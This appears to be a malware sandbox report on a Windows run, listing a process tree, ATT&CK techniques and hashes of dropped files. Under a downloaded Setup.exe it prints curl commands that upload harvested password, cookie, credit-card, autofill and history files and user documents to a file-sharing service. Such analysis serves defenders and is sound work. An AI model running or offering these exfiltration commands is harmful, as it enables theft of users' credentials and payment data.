  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,13623309574998097643,9281945603081609721,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1920 /prefetch:2
  2⤵
  PID:1048
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,13623309574998097643,9281945603081609721,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:328
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,13623309574998097643,9281945603081609721,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2548 /prefetch:8
  2⤵
  PID:1100
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13623309574998097643,9281945603081609721,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2400 /prefetch:1
  2⤵
  PID:3860
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13623309574998097643,9281945603081609721,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3144 /prefetch:1
  2⤵
  PID:4448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13623309574998097643,9281945603081609721,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4616 /prefetch:1
  2⤵
  PID:672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13623309574998097643,9281945603081609721,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3488 /prefetch:1
  2⤵
  PID:892
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1908,13623309574998097643,9281945603081609721,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5548 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3040
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13623309574998097643,9281945603081609721,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5596 /prefetch:1
  2⤵
  PID:1856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13623309574998097643,9281945603081609721,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:1
  2⤵
  PID:2888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13623309574998097643,9281945603081609721,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3732 /prefetch:1
  2⤵
  PID:488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13623309574998097643,9281945603081609721,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3500 /prefetch:1
  2⤵
  PID:4920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1908,13623309574998097643,9281945603081609721,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5336 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1288
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13623309574998097643,9281945603081609721,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:1
  2⤵
  PID:3360
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13623309574998097643,9281945603081609721,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:1
  2⤵
  PID:3344
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13623309574998097643,9281945603081609721,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5188 /prefetch:1
  2⤵
  PID:4884
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13623309574998097643,9281945603081609721,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3148 /prefetch:1
  2⤵
  PID:2004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13623309574998097643,9281945603081609721,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6444 /prefetch:1
  2⤵
  PID:1296
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13623309574998097643,9281945603081609721,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1
  2⤵
  PID:2152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13623309574998097643,9281945603081609721,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5812 /prefetch:1
  2⤵
  PID:4552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1908,13623309574998097643,9281945603081609721,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6104 /prefetch:8
  2⤵
  PID:3588
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1908,13623309574998097643,9281945603081609721,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6388 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:3000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13623309574998097643,9281945603081609721,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5884 /prefetch:1
  2⤵
  PID:1768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13623309574998097643,9281945603081609721,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3556 /prefetch:1
  2⤵
  PID:5280
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13623309574998097643,9281945603081609721,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5724 /prefetch:1
  2⤵
  PID:5476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13623309574998097643,9281945603081609721,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6748 /prefetch:1
  2⤵
  PID:5680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13623309574998097643,9281945603081609721,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1328 /prefetch:1
  2⤵
  PID:4872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1908,13623309574998097643,9281945603081609721,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7084 /prefetch:8
  2⤵
  PID:1548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,13623309574998097643,9281945603081609721,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7132 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:5600
- C:\Users\Admin\Downloads\processhacker-2.39-setup.exe
  "C:\Users\Admin\Downloads\processhacker-2.39-setup.exe"
  2⤵
  - Executes dropped EXE
  PID:5828
- - C:\Users\Admin\AppData\Local\Temp\is-53GND.tmp\processhacker-2.39-setup.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-53GND.tmp\processhacker-2.39-setup.tmp" /SL5="$A02D4,1874675,150016,C:\Users\Admin\Downloads\processhacker-2.39-setup.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    PID:5996
  - - C:\Program Files\Process Hacker 2\ProcessHacker.exe
      "C:\Program Files\Process Hacker 2\ProcessHacker.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Enumerates connected drives
      Checks system information in the registry
      Drops file in Program Files directory
      Checks SCSI registry key(s)
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:4680
    - - C:\Program Files\Process Hacker 2\peview.exe
        
        "C:\Program Files\Process Hacker 2\peview.exe" "C:\Windows\System32\bcryptprimitives.dll"
        5⤵
        Executes dropped EXE
        
        PID:1656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13623309574998097643,9281945603081609721,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6628 /prefetch:1
  2⤵
  PID:5904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13623309574998097643,9281945603081609721,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5800 /prefetch:1
  2⤵
  PID:3192
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,13623309574998097643,9281945603081609721,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=7636 /prefetch:2
  2⤵
  PID:3220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13623309574998097643,9281945603081609721,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:1
  2⤵
  PID:6044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13623309574998097643,9281945603081609721,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1744 /prefetch:1
  2⤵
  PID:5616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1908,13623309574998097643,9281945603081609721,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6420 /prefetch:8
  2⤵
  PID:5860
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,13623309574998097643,9281945603081609721,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6716 /prefetch:8
  2⤵
  - NTFS ADS
  PID:5288
- C:\Users\Admin\Downloads\Setup.exe
  "C:\Users\Admin\Downloads\Setup.exe"
  2⤵
  - Executes dropped EXE
  PID:2208
- - C:\Users\Admin\Downloads\Setup.exe
    "C:\Users\Admin\Downloads\Setup.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Loads dropped DLL
    PID:3924
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store9.gofile.io/uploadFile"
      4⤵
      PID:1632
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store9.gofile.io/uploadFile
        5⤵
        
        PID:5632
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store9.gofile.io/uploadFile"
      4⤵
      PID:5832
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store9.gofile.io/uploadFile
        5⤵
        
        PID:1044
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store9.gofile.io/uploadFile"
      4⤵
      PID:5460
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store9.gofile.io/uploadFile
        5⤵
        
        PID:1448
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store9.gofile.io/uploadFile"
      4⤵
      PID:2444
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store9.gofile.io/uploadFile
        5⤵
        
        PID:772
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store9.gofile.io/uploadFile"
      4⤵
      PID:5060
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store9.gofile.io/uploadFile
        5⤵
        
        PID:4472
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store9.gofile.io/uploadFile"
      4⤵
      PID:504
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store9.gofile.io/uploadFile
        5⤵
        
        PID:716
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Downloads/BackupResume.xltm" https://store9.gofile.io/uploadFile"
      4⤵
      PID:4740
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin/Downloads/BackupResume.xltm" https://store9.gofile.io/uploadFile
        5⤵
        
        PID:4232
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Documents/ReceiveBackup.docx" https://store9.gofile.io/uploadFile"
      4⤵
      PID:1872
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin/Documents/ReceiveBackup.docx" https://store9.gofile.io/uploadFile
        5⤵
        
        PID:5856
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Documents/SetBackup.xltx" https://store9.gofile.io/uploadFile"
      4⤵
      PID:5336
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin/Documents/SetBackup.xltx" https://store9.gofile.io/uploadFile
        5⤵
        
        PID:5512

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4492

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2220

C:\Program Files\Process Hacker 2\ProcessHacker.exe
"C:\Program Files\Process Hacker 2\ProcessHacker.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:924

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Process Hacker 2\ProcessHacker.exe

Filesize
1.6MB

MD5
b365af317ae730a67c936f21432b9c71

SHA1
a0bdfac3ce1880b32ff9b696458327ce352e3b1d

SHA256
bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4

SHA512
cc3359e16c6fe905a9e176a87acf4c4ed5e22c29bfca11949799caf8442e00ec0d1679b3d8754dbc3e313528d3e8e82c0ec1941e2c3530b48229c1cb337f6b8b

Download Submit
C:\Program Files\Process Hacker 2\ProcessHacker.sig

Filesize
64B

MD5
2ccb4420d40893846e1f88a2e82834da

SHA1
ef29efec7e3e0616948f9fe1fd016e43b6c971de

SHA256
519c2c2ca0caf00db5b3eb2b79dfe42e6128161c13aeb4b4d8b86fbffc67e3d4

SHA512
b2a000b33d4a9b2e886208fc78aeb3a986f7bd379fb6910da9f6577603aa6e8237cb552eabca70445f37b427419beeff0b061090cb952331b8db322ce2e58bc6

Download Submit
C:\Program Files\Process Hacker 2\peview.exe

Filesize
229KB

MD5
dde1f44789cd50c1f034042d337deae3

SHA1
e7e494bfadb3d6cd221f19498c030c3898d0ef73

SHA256
4259e53d48a3fed947f561ff04c7f94446bedd64c87f52400b2cb47a77666aaa

SHA512
33060b907c4bc2335328498aac832790f7bc43281788fa51f9226a254f2e4dbd0a73b230d54c2cde499b2f2e252b785a27c9159fc5067018425a9b9dbcdbedbc

Download Submit
C:\Program Files\Process Hacker 2\plugins\DotNetTools.dll

Filesize
132KB

MD5
b16ce8ba8e7f0ee83ec1d49f2d0af0a7

SHA1
cdf17a7beb537853fae6214d028754ce98e2e860

SHA256
b4cc0280e2caa0335361172cb7d673f745defc78299ded808426ffbc2458e4d9

SHA512
32de59c95d1690f4221b236376e282c8be1bb7f5d567592b935dcd798b36b80e86da81741c5845fa280386f75f6eafc9bbd41035362984150b134d24aede61eb

Download Submit
C:\Program Files\Process Hacker 2\plugins\ExtendedNotifications.dll

Filesize
140KB

MD5
be4dc4d2d1d05001ab0bb2bb8659bfad

SHA1
c0ed9e375b447b61c07c0b00c93bb81c87bcfc2e

SHA256
61e8cd8de80a5c0d7ced280fe04ad8387a846a7bf2ee51bcbba96b971c7c1795

SHA512
31389e268fe3bf1175fa3c251ca026f77dc59361b8425c9826f31d18c5174e6de68c6092aef187f2bd2c92d89b3093a660b2fe6189af369293c1117c856b5cdf

Download Submit
C:\Program Files\Process Hacker 2\plugins\ExtendedServices.dll

Filesize
136KB

MD5
4858bdb7731bf0b46b247a1f01f4a282

SHA1
de2f9cbcec1e1fa891d9693fb3cadfdd4cfe1f60

SHA256
5ae7c0972fd4e4c4ae14c0103602ca854377fefcbccd86fa68cfc5a6d1f99f60

SHA512
41b39560e15d620733ca29dc37f55a939a653f99686ac86643ccc67fbb807ad95d1996b867319d98506f3b8a30772fff3c3317bbcc205987f48031923f674d9a

Download Submit
C:\Program Files\Process Hacker 2\plugins\ExtendedTools.dll

Filesize
196KB

MD5
bc61e6fb02fbbfe16fb43cc9f4e949f1

SHA1
307543fcef62c6f8c037e197703446fcb543424a

SHA256
f2805e0f81513641a440f1a21057a664961c22192cb33fca3870362c8f872d87

SHA512
0bbfe53e1dd933a3080d9775ad890fcbd73f9820885efa6b69e9664261249f34eaae3870f74de8511734fc9a0114f36e1bfc529a032d303a8e3e583e37a506c6

Download Submit
C:\Program Files\Process Hacker 2\plugins\HardwareDevices.dll

Filesize
180KB

MD5
a46c8bb886e0b9290e5dbc6ca524d61f

SHA1
cfc1b93dc894b27477fc760dfcfb944cb849cb48

SHA256
acd49f2aa36d4efb9c4949e2d3cc2bd7aee384c2ced7aa9e66063da4150fcb00

SHA512
5a4d2e0fa7a1a14bc4c94a0c144bfbfcef1ecabe4dc15f668605d27f37f531934778f53e7377bab0ff83531732dc15e9fc40b16f2d1f7e925429681bd5bdca73

Download Submit
C:\Program Files\Process Hacker 2\plugins\NetworkTools.dll

Filesize
134KB

MD5
d6bed1d6fdbed480e32fdd2dd4c13352

SHA1
544567d030a19e779629eed65d2334827dcda141

SHA256
476aa6af14dd0b268786e32543b9a6917a298d4d90e1015dac6fb2b522cf5d2e

SHA512
89362a7b675651f44649f0ea231f039e0b91aba9f84c91545f15e187c6cbd07bbf3648a4e232dfe5122cf5636e67c458f4f7dab49ed4de3f3a303aa396c41d1c

Download Submit
C:\Program Files\Process Hacker 2\plugins\OnlineChecks.dll

Filesize
222KB

MD5
12c25fb356e51c3fd81d2d422a66be89

SHA1
7cc763f8dc889a4ec463aaba38f6e6f65dbdbb8c

SHA256
7336d66588bbcfea63351a2eb7c8d83bbd49b5d959ba56a94b1fe2e905a5b5de

SHA512
927d785d03c1ee44b5e784b35a09168978b652f37fb73a1a2eeecd3583c28595fb030e8c1f87ab9a20beac4622775777820d1a2ad7219ba8b9ae8b6fbc4568a0

Download Submit
C:\Program Files\Process Hacker 2\plugins\SbieSupport.dll

Filesize
95KB

MD5
37cbfa73883e7e361d3fa67c16d0f003

SHA1
ffa24756cdc37dfd24dc97ba7a42d0399e59960a

SHA256
57c56f7b312dc1f759e6ad039aac3f36ce5130d259eb9faad77239083398308b

SHA512
6e0bfab9ff44f580f302cabd06fc537a9e24432effd94b50ab696b35f57a61772072b7f9045a9e99fa4bf3bc316f43ea25ab6c87517242e7957eb86575203bed

Download Submit
C:\Program Files\Process Hacker 2\plugins\ToolStatus.dll

Filesize
243KB

MD5
3788efff135f8b17a179d02334d505e6

SHA1
d6c965ba09b626d7d157372756ea1ec52a43f6b7

SHA256
5713d40dec146dbc819230daefe1b886fa6d6f6dbd619301bb8899562195cbab

SHA512
215d6c3665323901d41ae5151908c4e084a04a1558617016f0788194304e066410b92943bd6c119339727037ee02cfda893b9baf5603b2870d9fc5ae0c77ca7e

Download Submit
C:\Program Files\Process Hacker 2\plugins\Updater.dll

Filesize
110KB

MD5
6976b57c6391f54dbd2828a45ca81100

SHA1
a8c312a56ede6f4852c34c316c01080762aa5498

SHA256
0c11cdc3765ffb53ba9707b6f99ec17ae4f7334578a935ba7bcbbc9c7bdeed2e

SHA512
54d8b39457f516d921bb907615ff60a46b6031e1444a443c9657e06d78c9fb0f637ae4756bb7b884e4dca2f55902372ad4ddba1d020abe02e0a381702ae270cc

Download Submit
C:\Program Files\Process Hacker 2\plugins\UserNotes.dll

Filesize
114KB

MD5
e48c789c425f966f5e5ee3187934174f

SHA1
96f85a86a56cbf55ebd547039eb1f8b0db9d9d8d

SHA256
fc9d0d0482c63ab7f238bc157c3c0fed97951ccf2d2e45be45c06c426c72cb52

SHA512
efdb42e4a1993ee6aa5c0c525bd58316d6c92fbc5cebbc3a66a26e2cf0c69fe68d19bc9313656ad1d38c4aef33131924684e226f88ef920e0e2cd607054a857c

Download Submit
C:\Program Files\Process Hacker 2\plugins\WindowExplorer.dll

Filesize
133KB

MD5
0e8d04159c075f0048b89270d22d2dbb

SHA1
d0fa2367d329909b6c9efcb3cc2c2902d8cf9b22

SHA256
282696487ea5dc781788d5d8477b977f72b7c70f201c2af0cfe7e1a9fd8d749a

SHA512
